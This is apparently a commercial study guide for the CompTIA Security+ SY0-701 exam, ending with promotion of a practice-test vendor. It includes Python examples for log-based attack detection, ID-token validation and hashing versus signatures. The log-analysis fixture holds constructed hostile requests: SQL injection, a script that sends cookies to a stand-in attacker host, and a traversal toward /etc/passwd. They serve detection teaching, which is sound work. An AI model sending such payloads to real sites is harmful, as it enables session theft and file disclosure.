How to Pass CompTIA Security+ (SY0-701): Complete 2026 Study Guide
Your comprehensive guide to passing CompTIA Security+. Domain breakdown, study strategies, common pitfalls, and the best resources to prepare for exam day.
CompTIA Security+ is the most popular entry-level cybersecurity certification in the world — and for good reason. It's vendor-neutral, globally recognized, and acts as the baseline credential for security roles ranging from security analyst to network administrator to SOC analyst. With over half a million certified professionals worldwide, it's often the first certification employers look for when hiring entry-level cybersecurity talent.
This guide covers everything you need to prepare for and pass the SY0-701 exam — the latest version of Security+, released in November 2023.
What Is CompTIA Security+?
Security+ (SY0-701) is an entry-level cybersecurity certification that validates the core skills required for a career in information security. Unlike vendor-specific certs (like Microsoft SC-900 or AWS Security Specialty), Security+ is vendor-neutral — it tests your understanding of fundamental security concepts that apply across any organization's tech stack.
The exam covers five domains, has up to 90 questions (a mix of multiple-choice and Performance-Based Questions, or PBQs), lasts 90 minutes, and is scored on a 100-900 scale with 750 needed to pass. In 2026, SY0-701 is the current exam version; CompTIA typically refreshes Security+ roughly every three years, so the next iteration (presumably SY0-801) is likely a year or two away.
Who Should Take Security+?
- Career changers moving into cybersecurity from adjacent IT roles
- IT professionals who need a security baseline (help desk, network admins, sysadmins)
- Students and recent graduates pursuing cybersecurity as their first role
- Military and government personnel who need DoD 8140 (formerly 8570) compliance; Security+ is an approved baseline credential
Security+ is also CompTIA's recommended stepping stone to CySA+ and SecurityX (formerly CASP+), and a sensible foundation before attempting CISSP, although none of those formally require it.
The 5 Exam Domains (With Weightages)
The SY0-701 exam is divided into five domains with specific weightages. Allocating your study time proportionally to these percentages is one of the smartest moves you can make.
1. General Security Concepts (12%)
The smallest domain by weight, but it lays the foundation for everything else. Focus on:
- The CIA triad — Confidentiality, Integrity, and Availability. Know the definition of each, real-world examples, and which controls map to which pillar. This is the single most important concept in the entire exam.
- Non-repudiation — how digital signatures and audit logs prevent someone from denying their actions
- Authentication methods — something you know (password), something you have (smart card, token), something you are (biometrics), and somewhere you are (geolocation)
- Zero Trust — the "never trust, always verify" model. SY0-701 describes it as a control plane (adaptive identity, threat scope reduction, policy-driven access control, the policy engine and policy administrator) and a data plane (implicit trust zones, subject/system, the policy enforcement point); know which component makes the decision and which enforces it
- Defense in depth — layered security controls (physical, technical, administrative)
Key concepts: CIA triad, AAA (Authentication, Authorization, Accounting), non-repudiation, Zero Trust, least privilege, separation of duties. Note that CompTIA also files cryptographic solutions under this domain (objective 1.4: symmetric vs. asymmetric encryption, hashing, digital signatures, PKI and certificates, key management), so don't let the 12% weight tempt you into skimping on crypto.
2. Threats, Vulnerabilities, and Mitigations (22%)
This is the second-largest domain and covers the threat landscape. Expect deep questions on:
- Types of malware — viruses, worms, Trojans, ransomware, spyware, rootkits, fileless malware
- Social engineering attacks — phishing (spear, whaling, vishing, smishing), pretexting, baiting, tailgating, impersonation
- Application attacks — SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), buffer overflows, directory traversal, plus the mitigation that pairs with each (parameterized queries, output encoding, anti-CSRF tokens, input validation, memory-safe languages)
- Network attacks — on-path attacks (the term SY0-701 uses for man-in-the-middle/MITM), denial of service (DoS/DDoS), DNS poisoning, ARP spoofing, session hijacking
- Physical attacks — brute force (door access), RFID cloning, environmental attacks
- Vulnerability scanning and penetration testing — know the difference and when each is used
Common trap: The exam loves presenting a scenario with multiple attack types happening simultaneously. Be able to identify each attack type individually even when they're combined in a question.
3. Security Architecture (18%)
This domain focuses on designing and implementing secure infrastructure:
- Network architecture — segmentation (screened subnet, which CompTIA now uses in place of DMZ, and VLANs), SDN, zero trust network access (ZTNA), VPNs, secure protocols (HTTPS, SSH, SFTP, IPsec)
- Cloud security — shared responsibility model, IaaS vs. PaaS vs. SaaS, cloud deployment models (public, private, hybrid), CASB, cloud security posture management (CSPM)
- Identity and access management (IAM) — SSO, SAML, OAuth, OpenID Connect, MFA, federated identity, directory services (Active Directory, LDAP). Strictly this is objective 4.6 under Security Operations, but it shows up in architecture scenarios too
- Cryptography — symmetric vs. asymmetric encryption (AES vs. RSA), hashing (SHA-2/SHA-3, and why MD5 and SHA-1 are no longer acceptable), digital signatures, PKI, certificates, key management. Officially this is objective 1.4 under General Security Concepts; if you study from the objectives list, that's where you'll find it
- Resiliency and high availability — redundancy, fault tolerance, replication, backup types (full, incremental, differential)
Key services and technologies: Firewalls (stateful vs. stateless), IDS/IPS, WAF, HSM, TPM, secure enclaves
4. Security Operations (28%)
The largest domain — make sure you spend the most study time here. It covers the day-to-day work of a security professional:
- Incident response process — this will be tested heavily. SY0-701 (objective 4.8) lists seven steps: Preparation → Detection → Analysis → Containment → Eradication → Recovery → Lessons Learned. NIST SP 800-61 folds the same work into four phases: Preparation → Detection & Analysis → Containment, Eradication & Recovery → Post-Incident Activity. Know both and how they map onto each other.
- Forensics — order of volatility (CPU cache > memory > swap > disk > remote archives), chain of custody, preservation of evidence
- Security monitoring — SIEM (Security Information and Event Management), log aggregation, Syslog, SNMP, SOAR
- Automation — playbooks, SOAR workflows, orchestration
- Vulnerability management — scanning frequency, patch management, CVSS scoring
- Data security — data types (PII, PHI, cardholder data governed by PCI DSS) and classification levels (public, internal, confidential, restricted), data at rest vs. in transit vs. in use, DLP policies, tokenization, masking
- Business continuity and disaster recovery — RTO, RPO, MTBF, MTTR, backup strategies, hot/cold/warm sites
Common trap: The exam frequently mixes up the order of the incident response phases. You'll see questions like "Which phase comes after Containment?" Make sure you know the sequence cold.
5. Security Program Management and Oversight (20%)
The third-largest domain covers governance, risk, and compliance:
- Security policies — acceptable use policy (AUP), data retention, change management, personnel policies (background checks, NDAs, mandatory vacations)
- Risk management — risk assessment (qualitative vs. quantitative), risk register, risk treatment options (avoid, transfer, mitigate, accept)
- Compliance frameworks — NIST, ISO 27001, PCI DSS, HIPAA, GDPR, FedRAMP, SOC 2
- Third-party risk — vendor assessments, SLAs, MOU, BPA
- Training and awareness — security awareness programs, phishing simulations
Key concepts: SLE (Single Loss Expectancy = asset value × exposure factor), ARO (Annualized Rate of Occurrence), ALE (Annualized Loss Expectancy = SLE × ARO), risk appetite vs. risk tolerance. Expect to compute ALE before and after a proposed control and compare the reduction against the control's annual cost.
Study Approach
Your timeline depends on your background. Here are two realistic paths:
For Beginners (6-10 Weeks)
If you're new to IT security or have less than a year of experience:
- Weeks 1-2: Learn the core concepts — CIA triad, authentication methods, encryption basics, types of malware. Watch Professor Messer's SY0-701 video series (free on YouTube) alongside the official CompTIA study guide.
- Weeks 3-4: Cover Security Architecture and Security Operations — the heaviest content areas. Set up a home lab with VirtualBox or VMware: create VMs, configure firewalls, observe network traffic with Wireshark.
- Weeks 5-6: Dive into Threats & Vulnerabilities and Security Program Management. Take detailed notes on attack types, risk formulas, and compliance frameworks.
- Weeks 7-8: Start taking practice exams. Identify your weak domains and go back to study guides and videos for those areas.
- Weeks 9-10: Full review — take timed practice exams, review PBQ strategies, drill the concepts you keep getting wrong.
For Experienced IT Pros (3-4 Weeks)
If you have 1-3 years of IT or networking experience:
- Week 1: Review all five domains using a cram guide or video series. Focus on the topics you don't encounter daily (crypto, PKI, compliance frameworks).
- Week 2: Practice exams, practice exams, practice exams. Take one full exam, review every wrong answer, and re-study those concepts.
- Week 3: PBQ practice, memorization drills (encryption algorithms, incident response phases, port numbers), and another full-length mock exam.
- Week 4: Final review — weakest domains only, one more full practice test, and test day prep.
Pro tip: The number one mistake candidates make is memorizing facts without understanding scenarios. Security+ questions are heavily scenario-based — knowing why something works is more important than knowing what it is.
PBQ (Performance-Based Question) Strategy
PBQs are hands-on simulations where you drag and drop, configure systems, or order steps. CompTIA doesn't publish how they're weighted, but with only a handful per exam each one counts for far more than a single multiple-choice item, and they are where most test-takers lose points.
PBQ types you'll see:
- Drag-and-drop — match security controls to scenarios, order incident response phases
- Network configuration — place firewalls, IDS/IPS, and VPN concentrators on a network diagram
- Log analysis — read a log entry and identify the attack type
- Policy placement — match security policies to organizational requirements
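The application attacks listed under domain 2 and the log-analysis PBQ type above come together in this added example (not from the original guide or from CompTIA): a small script that labels constructed web-server and sshd log lines as SQL injection, XSS, directory traversal or a brute-force login attempt. The log lines, IP addresses, year and thresholds are all made up for the demo.

```python
"""Label the attack behind each log line, the way a log-analysis PBQ expects.

Added example for this guide, not CompTIA material. The web and sshd lines
below are constructed; the patterns are deliberately simple signatures meant
to show what to look for, not a production IDS rule set.
"""
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import unquote

# Constructed Apache combined-log entries (three hostile, one benign).
WEB_LOG = """\
203.0.113.10 - - [12/Jan/2026:10:00:01 +0000] "GET /login?user=admin%27%20OR%20%271%27%3D%271&pw=x HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.10 - - [12/Jan/2026:10:00:02 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 88 "-" "curl/8.0"
203.0.113.10 - - [12/Jan/2026:10:00:03 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 0 "-" "curl/8.0"
198.51.100.7 - - [12/Jan/2026:10:00:04 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "https://shop.example/" "Mozilla/5.0"
"""

# Constructed sshd auth.log entries: one source hammering root, one real user.
AUTH_LOG = """\
Jan 12 10:05:00 web1 sshd[1201]: Failed password for root from 203.0.113.10 port 50001 ssh2
Jan 12 10:05:03 web1 sshd[1202]: Failed password for root from 203.0.113.10 port 50002 ssh2
Jan 12 10:05:05 web1 sshd[1203]: Failed password for root from 203.0.113.10 port 50003 ssh2
Jan 12 10:05:08 web1 sshd[1204]: Failed password for root from 203.0.113.10 port 50004 ssh2
Jan 12 10:05:10 web1 sshd[1205]: Failed password for root from 203.0.113.10 port 50005 ssh2
Jan 12 10:05:12 web1 sshd[1206]: Failed password for root from 203.0.113.10 port 50006 ssh2
Jan 12 10:20:00 web1 sshd[1300]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Jan 12 10:20:09 web1 sshd[1301]: Accepted password for alice from 198.51.100.7 port 51001 ssh2
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
AUTH_FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)

# Signatures run against the *decoded* request path. A request may match
# more than one; labels come back in this order.
SIGNATURES = {
    "SQL injection": re.compile(r"""['"]\s*(?:or|and)\s*['"]?\d+['"]?\s*=|union\s+select|--\s*$""", re.I),
    "Cross-site scripting": re.compile(r"<\s*script|javascript:|onerror\s*=", re.I),
    "Directory traversal": re.compile(r"\.\.[/\\]"),
}

def decode_path(path: str) -> str:
    """Percent-decode twice so double-encoded payloads (%252e%252e) surface too."""
    return unquote(unquote(path))

def classify_web_log(log: str) -> list:
    """Return (source_ip, decoded_path, [labels]) per request; benign -> []."""
    findings = []
    for line in log.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = decode_path(m["path"])
        findings.append((m["ip"], path, [n for n, rx in SIGNATURES.items() if rx.search(path)]))
    return findings

def detect_brute_force(log: str, threshold: int = 5, window_s: int = 60, year: int = 2026) -> dict:
    """Return {ip: failures_in_worst_window} for sources at or over the threshold.

    Syslog timestamps carry no year, so one is supplied (2026 matches the
    constructed data). A sliding window avoids flagging a user who mistypes
    a password a few times a month.
    """
    recent, worst = defaultdict(deque), defaultdict(int)
    for line in log.splitlines():
        m = AUTH_FAIL_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[m["ip"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        worst[m["ip"]] = max(worst[m["ip"]], len(q))
    return {ip: n for ip, n in worst.items() if n >= threshold}

if __name__ == "__main__":
    for ip, path, labels in classify_web_log(WEB_LOG):
        print(ip, labels or ["benign"], path)
    print("brute force:", detect_brute_force(AUTH_LOG))
```

The point to carry into the exam is the reading order, not the regexes: decode first (the payload is almost always URL-encoded in a PBQ screenshot), then look for the tell-tale characters of each attack class, and for authentication logs look at rate and source rather than any single line.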
How to approach PBQs:
- Flag and skip the PBQs first. CompTIA allows you to mark questions and return to them. Many candidates start with the multiple-choice section and come back to PBQs once they've warmed up.
- Read PBQ instructions very carefully. Each step or detail matters — a single misplacement can cost you the entire question.
- Eliminate obviously wrong options first in drag-and-drop questions.
- Practice PBQ-style questions before exam day. Use resources like Certeli's practice tests, which include scenario-based PBQ simulations.
Common Exam Traps
These are the mistakes that trip up even well-prepared candidates:
Confusing Authentication Protocols
The exam loves mixing up SAML, OAuth, OpenID Connect, and Kerberos. Here's a quick cheat sheet:
- SAML — XML-based, used for enterprise SSO (federated identity between organizations; the identity provider hands the service provider a signed assertion)
- OAuth 2.0 — authorization framework (delegated access via access tokens), e.g. letting a third-party app read your calendar without ever seeing your password. On its own it does not authenticate the user
- OpenID Connect (OIDC) — authentication layer built on top of OAuth 2.0, adds an ID token (a JWT) that tells the app who logged in. "Login with Google" is OIDC, not bare OAuth
- Kerberos — ticket-based network authentication using a Key Distribution Center (KDC). Developed at MIT, not by Microsoft, although Active Directory is where most people meet it
- RADIUS — centralized AAA for network access (wireless, VPN); runs over UDP and encrypts only the password field
- TACACS+ — Cisco-developed AAA protocol (now documented in RFC 8907); runs over TCP 49, separates authentication, authorization and accounting, and encrypts the entire packet body
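To make the OAuth/OIDC distinction concrete, here is an added example (not from this guide's author or from CompTIA) of the checks a relying party must perform before trusting an ID token. The issuer, client_id, shared secret and claims are constructed; it uses HS256 so it runs offline, whereas real providers sign with RS256 and publish keys at a JWKS URL.

```python
"""Validate an OpenID Connect ID token the way a relying party must.

Added example for this guide, not CompTIA material. Real identity providers
sign ID tokens with RS256 and publish keys via a JWKS URL; to stay
self-contained this uses HS256 (HMAC-SHA256) with the client secret, which
OIDC also allows. Issuer, client_id, secret and claims are all constructed.
"""
import base64
import hashlib
import hmac
import json
import time

ISSUER = "https://idp.example"                      # assumed IdP
CLIENT_ID = "demo-relying-party"                    # assumed client_id
CLIENT_SECRET = b"constructed-shared-secret-for-demo"

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def mint_id_token(claims: dict, secret: bytes = CLIENT_SECRET, alg: str = "HS256") -> str:
    """Stand-in for the IdP: build header.payload.signature."""
    header = _b64url(json.dumps({"alg": alg, "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest() if alg == "HS256" else b""
    return f"{header}.{payload}.{_b64url(sig)}"

def validate_id_token(token: str, expected_nonce: str, now=None, secret: bytes = CLIENT_SECRET) -> dict:
    """Return the claims if every check passes; raise ValueError naming the first failure.

    Order matters: pin the algorithm before trusting the header, verify the
    signature before reading any claim, then check iss, aud, exp and nonce.
    """
    now = time.time() if now is None else now
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(_b64url_decode(h64))
        claims = json.loads(_b64url_decode(p64))
    except ValueError:
        raise ValueError("malformed token") from None
    if not isinstance(header, dict) or not isinstance(claims, dict):
        raise ValueError("malformed token")
    if header.get("alg") != "HS256":                  # rejects 'none' and RS256->HS256 swaps
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    expected = hmac.new(secret, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s64)):
        raise ValueError("bad signature")
    if claims.get("iss") != ISSUER:
        raise ValueError("wrong issuer")
    aud = claims.get("aud")
    if aud != CLIENT_ID and not (isinstance(aud, list) and CLIENT_ID in aud):
        raise ValueError("token not intended for this client")
    if not isinstance(claims.get("exp"), (int, float)) or now >= claims["exp"]:
        raise ValueError("token expired")
    if claims.get("nonce") != expected_nonce:         # nonce = the value we sent in the auth request
        raise ValueError("nonce mismatch (possible replay)")
    return claims

def tamper(token: str) -> str:
    """Rewrite the sub claim without re-signing, as an attacker would try."""
    h64, p64, s64 = token.split(".")
    claims = json.loads(_b64url_decode(p64))
    claims["sub"] = "admin"
    return f"{h64}.{_b64url(json.dumps(claims, separators=(',', ':')).encode())}.{s64}"

def walkthrough(now: int = 1_767_225_600) -> dict:
    """One good token and five common failure modes, evaluated at a fixed 'now'."""
    good = {"iss": ISSUER, "sub": "user-1", "aud": CLIENT_ID,
            "iat": now - 10, "exp": now + 300, "nonce": "n-1"}
    out = {"valid": validate_id_token(mint_id_token(good), "n-1", now)["sub"]}
    cases = {
        "alg_none": (mint_id_token(good, alg="none"), "n-1"),
        "tampered_body": (tamper(mint_id_token(good)), "n-1"),
        "wrong_audience": (mint_id_token({**good, "aud": "other-app"}), "n-1"),
        "expired": (mint_id_token({**good, "exp": now - 1}), "n-1"),
        "replayed_nonce": (mint_id_token(good), "n-2"),
    }
    for name, (token, nonce) in cases.items():
        try:
            validate_id_token(token, nonce, now)
            out[name] = "accepted"
        except ValueError as exc:
            out[name] = str(exc)
    return out

if __name__ == "__main__":
    for name, result in walkthrough().items():
        print(f"{name:16} {result}")
```

The access token (OAuth) is what you present to an API; the ID token (OIDC) is what tells your app who the user is, and every one of the checks above exists because someone once skipped it: unpinned algorithms let "alg": "none" through, a missing audience check lets a token minted for one app log into another, and a missing nonce check lets a captured token be replayed.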
Wrong Order in Incident Response
This is the #1 memorization trap. Two models exist and both are fair game:
NIST SP 800-61 model (4 phases):
1. Preparation → 2. Detection & Analysis → 3. Containment, Eradication & Recovery → 4. Post-Incident Activity
CompTIA SY0-701 model (7 steps, objective 4.8):
1. Preparation → 2. Detection → 3. Analysis → 4. Containment → 5. Eradication → 6. Recovery → 7. Lessons Learned
Memory aid: "Please Don't Ask Cats Eating Raw Lasagna"
Encryption Algorithm Confusion
Another frequent confusion point. Memorize these:
- Symmetric (one shared key, fast, used for bulk data): AES (the standard; AES-GCM also authenticates), ChaCha20, Blowfish, Twofish. DES and 3DES are deprecated and should only ever be the wrong answer
- Asymmetric (public/private key pair, slow, used for key exchange and signatures): RSA, ECC, Diffie-Hellman and ECDH (key agreement only, no encryption or signing), DSA, ECDSA
- Hashing (one-way, fixed length, no key): SHA-256, SHA-3. MD5 and SHA-1 are broken for collision resistance. HMAC is the keyed exception: a hash combined with a shared secret, so it proves integrity and origin to the other key holder
Exam tip: "confidentiality" means encryption (AES for the data, RSA or ECDH to move the key). "Integrity" on its own means a hash or HMAC. "Non-repudiation" needs a digital signature: anyone can recompute a hash, and either key holder can produce an HMAC, so only a private key ties an action to one party.
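The exam tip above sticks better once you've watched each property fail. This added example (not from the guide or from CompTIA) checks a bare SHA-256 hash, an HMAC and an RSA signature against a tampered message. The message and key are constructed, and the RSA is deliberately textbook (no padding, 512-bit modulus, seeded RNG) so it stays self-contained and readable; it is a teaching aid, not a recipe for real signing.

```python
"""Hash vs. HMAC vs. digital signature, side by side.

Added example for this guide, not CompTIA material. hashlib and hmac are
the real standard-library modules; the RSA below is *textbook* RSA (no
padding, 512-bit modulus, seeded RNG) written only to make the property
visible on a laptop. Never use it to sign anything real.
"""
import hashlib
import hmac
import random

# --- Integrity only: an unkeyed hash ----------------------------------------
def sha256_tag(message: bytes) -> bytes:
    return hashlib.sha256(message).digest()

def sha256_check(message: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(sha256_tag(message), tag)

# --- Integrity + origin for the other key holder: HMAC ----------------------
def hmac_tag(key: bytes, message: bytes) -> bytes:
    return hmac.new(key, message, hashlib.sha256).digest()

def hmac_check(key: bytes, message: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(hmac_tag(key, message), tag)

# --- Non-repudiation: a signature only the private key can produce ---------
def _probable_prime(n: int, rng: random.Random, rounds: int = 16) -> bool:
    """Miller-Rabin; good enough for a demo key."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def _random_prime(bits: int, rng: random.Random) -> int:
    while True:
        cand = rng.getrandbits(bits) | (1 << (bits - 1)) | 1  # force size and oddness
        if _probable_prime(cand, rng):
            return cand

def rsa_keygen(bits: int = 512, seed: int = 1) -> tuple:
    """Return ((n, e), (n, d)). Seeded so the walkthrough is reproducible."""
    rng = random.Random(seed)
    e = 65537
    while True:
        p, q = _random_prime(bits // 2, rng), _random_prime(bits // 2, rng)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            break
    return (p * q, e), (p * q, pow(e, -1, phi))

def _digest_int(message: bytes) -> int:
    return int.from_bytes(hashlib.sha256(message).digest(), "big")

def rsa_sign(priv: tuple, message: bytes) -> int:
    n, d = priv
    return pow(_digest_int(message), d, n)   # sign the hash, never the raw message

def rsa_verify(pub: tuple, message: bytes, sig: int) -> bool:
    n, e = pub
    return pow(sig, e, n) == _digest_int(message)

def walkthrough() -> dict:
    """Constructed message; every entry should come out True."""
    msg, forged = b"transfer 100 to acct 42", b"transfer 900 to acct 42"
    out = {}
    # 1. A bare hash catches corruption, but an attacker who can rewrite the
    #    message just recomputes the hash. Integrity, no authenticity.
    out["hash_catches_tamper"] = not sha256_check(forged, sha256_tag(msg))
    out["hash_trivially_forged"] = sha256_check(forged, sha256_tag(forged))
    # 2. HMAC needs the shared key, so the receiver knows it came from a key
    #    holder. But both ends hold the key, so either could have made it:
    #    no non-repudiation.
    key = b"shared-secret-constructed-for-demo"
    mac = hmac_tag(key, msg)
    out["hmac_rejects_tamper"] = not hmac_check(key, forged, mac)
    out["hmac_rejects_wrong_key"] = not hmac_check(b"not-the-key", msg, mac)
    # 3. Only the private key signs; anyone with the public key verifies.
    #    The signer cannot credibly deny it later.
    pub, priv = rsa_keygen(seed=1)
    sig = rsa_sign(priv, msg)
    out["sig_verifies"] = rsa_verify(pub, msg, sig)
    out["sig_rejects_tamper"] = not rsa_verify(pub, forged, sig)
    _, other_priv = rsa_keygen(seed=2)
    out["sig_rejects_other_signer"] = not rsa_verify(pub, msg, rsa_sign(other_priv, msg))
    return out

if __name__ == "__main__":
    for name, ok in walkthrough().items():
        print(f"{name:28} {ok}")
```

Map the three sections back to the exam vocabulary: the hash gives integrity, the HMAC gives integrity plus authenticity between two parties that share a key, and the signature gives non-repudiation because only one party could have produced it. None of them gives confidentiality; that is what AES is for.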
Port Number Gotchas
Memorize these common ones:
| Service | Port | Protocol |
|---|---|---|
| FTP | 21 | TCP |
| SSH / SFTP / SCP | 22 | TCP |
| Telnet | 23 | TCP |
| SMTP | 25 | TCP |
| TACACS+ | 49 | TCP |
| DNS | 53 | UDP/TCP |
| DHCP | 67/68 | UDP |
| TFTP | 69 | UDP |
| HTTP | 80 | TCP |
| Kerberos | 88 | TCP/UDP |
| POP3 | 110 | TCP |
| NTP | 123 | UDP |
| IMAP | 143 | TCP |
| SNMP | 161 (traps on 162) | UDP |
| LDAP | 389 | TCP |
| HTTPS | 443 | TCP |
| SMB | 445 | TCP |
| Syslog | 514 | UDP |
| SMTP submission (STARTTLS) | 587 | TCP |
| LDAPS | 636 | TCP |
| IMAPS | 993 | TCP |
| POP3S | 995 | TCP |
| SQL Server | 1433 | TCP |
| RADIUS | 1812/1813 | UDP |
| MySQL | 3306 | TCP |
| RDP | 3389 | TCP |
The exam won't give you these; you just need to know them. The pattern worth learning is insecure protocol → secure replacement: Telnet 23 → SSH 22, HTTP 80 → HTTPS 443, LDAP 389 → LDAPS 636, FTP 21 → SFTP 22 (or FTPS 990), SMTP 25 → submission 587 with STARTTLS, IMAP 143 → IMAPS 993, POP3 110 → POP3S 995.
Why Practice Exams Matter (A Lot)
You cannot pass Security+ without taking practice exams — full stop. Here's why:
- They train your brain for CompTIA's question style. Security+ questions are wordy and scenario-driven. Practice exams teach you to extract the key details quickly.
- They reveal your weak domains. If you're scoring 80% on Security Operations but 50% on Security Architecture, you know exactly where to focus.
- They build exam stamina. The real exam is 90 minutes. Taking timed practice tests simulates the pressure and teaches you pacing.
- They expose trap patterns. CompTIA uses specific trick question patterns — you'll recognize them on exam day if you've seen them in practice tests.
How to Use Practice Exams Effectively
- Don't take a practice test until you've completed your first pass of the material. Taking one cold is a waste — you'll just get discouraged.
- After each practice test, review EVERY question you got wrong. Understand why the correct answer is correct and why the wrong answers are wrong.
- Track your domain scores. If you consistently struggle with one domain, go back to the study materials.
- Aim for 85%+ on practice exams before booking the real thing. This gives you a comfortable margin above the passing score (750/900).
- Take at least 3-5 full-length practice exams before exam day.
Recommended Study Resources
Free Resources
- Professor Messer's SY0-701 Course — The gold standard. Free video series covering every exam objective. Watch at 1.25x speed if you're on a tight schedule.
- CompTIA SY0-701 Exam Objectives PDF — CompTIA publishes the full exam objectives. Print them and check off topics as you master them.
- CompTIA Security+ Acronyms List — Download and memorize. The exam uses acronyms without spelling them out.
- YouTube walkthroughs — Search for "SY0-701 PBQ walkthrough" for hands-on simulation practice.
Paid Resources
- CompTIA Official Study Guide (Sybex) — The "bible" of Security+ study materials. Comprehensive but dense.
- CompTIA CertMaster Practice — CompTIA's official practice question bank. Good but expensive.
- Jason Dion's Practice Exams (Udemy) — Widely regarded as the most realistic practice tests outside of the real exam.
- Certeli CompTIA Security+ Practice Tests — Realistic SY0-701 practice questions with detailed explanations and performance tracking.
Hands-On Practice
Security+ is less hands-on than certs like AZ-104, but you still benefit from lab work:
- TryHackMe (SOC Fundamentals path) — Free tier covers SIEM, log analysis, and incident response
- Wireshark — Capture and analyze network traffic to understand packet-level attacks
- VirtualBox + Kali Linux — Set up deliberately vulnerable VMs on an isolated host-only network and practice scanning and exploiting them
- Security Onion — A free Linux distro for security monitoring and log analysis
Exam Day Tips
- Arrive early. You'll need to check in, show ID, and get settled. Pearson VUE centers are strict about timing.
- Flag hard questions and move on. You have 90 minutes for up to 90 questions. Don't get stuck — flag and return.
- Read the ENTIRE question before looking at answers. CompTIA often buries critical details in the last sentence of a scenario.
- Eliminate two wrong answers first. Most questions have two clearly wrong options. Work from there.
- PBQ strategy: Skip PBQs initially, answer all multiple-choice questions, then come back to PBQs with remaining time.
- Bring your CompTIA exam confirmation and two forms of ID. A government-issued photo ID (driver's license or passport) plus a second ID bearing your name and signature, such as a credit card, is the standard Pearson VUE requirement.
- Don't change answers unless you're sure. Change an answer only when you've found a concrete error in your reasoning, not on a vague second-guess.
Start Your Security+ Journey Today
CompTIA Security+ is your gateway to a career in cybersecurity. It's challenging, but with the right study plan, consistent practice, and high-quality practice questions, you can pass on your first attempt.
Ready to test your knowledge? Try CompTIA Security+ practice questions on Certeli — realistic SY0-701 scenarios, detailed explanations, and performance tracking to identify your weak spots before exam day. Whether you're looking for CompTIA Security+ practice tests, SY0-701 exam prep resources, or a complete Security+ study guide, Certeli has everything you need to succeed.